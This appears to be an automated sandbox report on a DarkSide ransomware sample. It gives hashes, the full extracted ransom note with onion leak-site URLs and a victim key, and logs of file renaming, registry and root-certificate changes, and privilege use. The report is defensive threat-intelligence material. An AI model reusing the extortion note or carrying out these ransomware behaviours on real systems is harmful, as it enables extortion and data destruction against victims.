darkside | 4dcb5d42f6a37cb000de14de346978fa3a9f6a8cd4e41aaec3a15534cc726a1d

Resubmissions

02-06-2023 10:03

230602-l3vmgaah67 10

02-06-2023 10:03

230602-l3hb5sah65 3

02-06-2023 09:55

230602-lxwbtaah45 3

Analysis

max time kernel
156s
max time network
235s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
02-06-2023 10:03

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Darkside.exe
Size

59KB
MD5

cfcfb68901ffe513e9f0d76b17d02f96
SHA1

766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
SHA256

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
SHA512

0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
SSDEEP

768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\README.6a2c0f68.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (182) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Modifies extensions of user files 16 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

Darkside.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\SkipBackup.tif.6a2c0f68	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\ExpandImport.crw.6a2c0f68	Darkside.exe
File renamed	C:\Users\Admin\Pictures\ExportUnblock.png => C:\Users\Admin\Pictures\ExportUnblock.png.6a2c0f68	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\ProtectEnable.png.6a2c0f68	Darkside.exe
File renamed	C:\Users\Admin\Pictures\ProtectEnable.png => C:\Users\Admin\Pictures\ProtectEnable.png.6a2c0f68	Darkside.exe
File renamed	C:\Users\Admin\Pictures\SetMove.png => C:\Users\Admin\Pictures\SetMove.png.6a2c0f68	Darkside.exe
File renamed	C:\Users\Admin\Pictures\CopyCheckpoint.raw => C:\Users\Admin\Pictures\CopyCheckpoint.raw.6a2c0f68	Darkside.exe
File renamed	C:\Users\Admin\Pictures\DenyAssert.crw => C:\Users\Admin\Pictures\DenyAssert.crw.6a2c0f68	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\ExportUnblock.png.6a2c0f68	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\DenyAssert.crw.6a2c0f68	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\MergeReset.crw.6a2c0f68	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\SetMove.png.6a2c0f68	Darkside.exe
File renamed	C:\Users\Admin\Pictures\SkipBackup.tif => C:\Users\Admin\Pictures\SkipBackup.tif.6a2c0f68	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\CopyCheckpoint.raw.6a2c0f68	Darkside.exe
File renamed	C:\Users\Admin\Pictures\ExpandImport.crw => C:\Users\Admin\Pictures\ExpandImport.crw.6a2c0f68	Darkside.exe
File renamed	C:\Users\Admin\Pictures\MergeReset.crw => C:\Users\Admin\Pictures\MergeReset.crw.6a2c0f68	Darkside.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

3516 cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3516	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

Darkside.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\6a2c0f68.BMP"	Darkside.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\6a2c0f68.BMP"	Darkside.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Darkside.exe

pid process

1480 Darkside.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1480	Darkside.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

Darkside.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\WallpaperStyle = "10"	Darkside.exe

Modifies registry class 6 IoCs

Processes:

Darkside.exerundll32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68\DefaultIcon	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68	Darkside.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\6a2c0f68\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\6a2c0f68.ico"	Darkside.exe
Key created	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.6a2c0f68	Darkside.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.6a2c0f68\ = "6a2c0f68"	Darkside.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Darkside.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Darkside.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Darkside.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Darkside.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Darkside.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Darkside.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

3572 NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exeDarkside.exechrome.exe

pid process

1724 powershell.exe
1480 Darkside.exe
1480 Darkside.exe
3616 chrome.exe
3616 chrome.exe

pid	process
3572	NOTEPAD.EXE

pid	process
1724	powershell.exe
1480	Darkside.exe
1480	Darkside.exe
3616	chrome.exe
3616	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Darkside.exepowershell.exevssvc.exechrome.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1480	Darkside.exe
Token: SeSecurityPrivilege	1480	Darkside.exe
Token: SeTakeOwnershipPrivilege	1480	Darkside.exe
Token: SeLoadDriverPrivilege	1480	Darkside.exe
Token: SeSystemProfilePrivilege	1480	Darkside.exe
Token: SeSystemtimePrivilege	1480	Darkside.exe
Token: SeProfSingleProcessPrivilege	1480	Darkside.exe
Token: SeIncBasePriorityPrivilege	1480	Darkside.exe
Token: SeCreatePagefilePrivilege	1480	Darkside.exe
Token: SeBackupPrivilege	1480	Darkside.exe
Token: SeRestorePrivilege	1480	Darkside.exe
Token: SeShutdownPrivilege	1480	Darkside.exe
Token: SeDebugPrivilege	1480	Darkside.exe
Token: SeSystemEnvironmentPrivilege	1480	Darkside.exe
Token: SeRemoteShutdownPrivilege	1480	Darkside.exe
Token: SeUndockPrivilege	1480	Darkside.exe
Token: SeManageVolumePrivilege	1480	Darkside.exe
Token: 33	1480	Darkside.exe
Token: 34	1480	Darkside.exe
Token: 35	1480	Darkside.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeBackupPrivilege	2036	vssvc.exe
Token: SeRestorePrivilege	2036	vssvc.exe
Token: SeAuditPrivilege	2036	vssvc.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe
Token: SeShutdownPrivilege	3616	chrome.exe

Suspicious use of FindShellTrayWindow 50 IoCs

Processes:

chrome.exe

pid	process
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

chrome.exe

pid	process
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe
3616	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

AcroRd32.exe

pid process

3252 AcroRd32.exe
3252 AcroRd32.exe

pid	process
3252	AcroRd32.exe
3252	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Darkside.exerundll32.exechrome.exe

description	pid	process	target process
PID 1480 wrote to memory of 1724	1480	Darkside.exe	powershell.exe
PID 1480 wrote to memory of 1724	1480	Darkside.exe	powershell.exe
PID 1480 wrote to memory of 1724	1480	Darkside.exe	powershell.exe
PID 1480 wrote to memory of 1724	1480	Darkside.exe	powershell.exe
PID 3128 wrote to memory of 3252	3128	rundll32.exe	AcroRd32.exe
PID 3128 wrote to memory of 3252	3128	rundll32.exe	AcroRd32.exe
PID 3128 wrote to memory of 3252	3128	rundll32.exe	AcroRd32.exe
PID 3128 wrote to memory of 3252	3128	rundll32.exe	AcroRd32.exe
PID 1480 wrote to memory of 3516	1480	Darkside.exe	cmd.exe
PID 1480 wrote to memory of 3516	1480	Darkside.exe	cmd.exe
PID 1480 wrote to memory of 3516	1480	Darkside.exe	cmd.exe
PID 1480 wrote to memory of 3516	1480	Darkside.exe	cmd.exe
PID 3616 wrote to memory of 3628	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3628	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3628	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
